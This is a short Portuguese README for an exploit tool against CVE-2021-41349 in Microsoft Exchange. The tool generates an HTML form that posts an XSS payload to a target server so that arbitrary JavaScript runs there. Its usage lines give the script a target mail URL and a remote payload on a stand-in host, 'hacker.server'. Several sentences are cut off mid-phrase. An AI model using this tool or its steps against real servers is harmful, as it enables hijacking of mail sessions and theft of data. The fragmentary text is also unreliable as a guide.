
Ferramenta de exploração para CVE-2021-41349 que gera um formulário HTML para entregar payloads de XSS a servidores Microsoft Exchange, permitindo a execução de JavaScript arbitrário.
Explorando: CVE-2021-41349
Esta ferramenta de exploração cria um Formulário para postar o Payload XSS no servidor Exchange de destino.
Você precisa criar um js contendo o que deseja fazer.
js e faça upload dele em algum lugar.CVE-2021-41349.py seguindo os passos abaixo.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
ou:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html no servidor.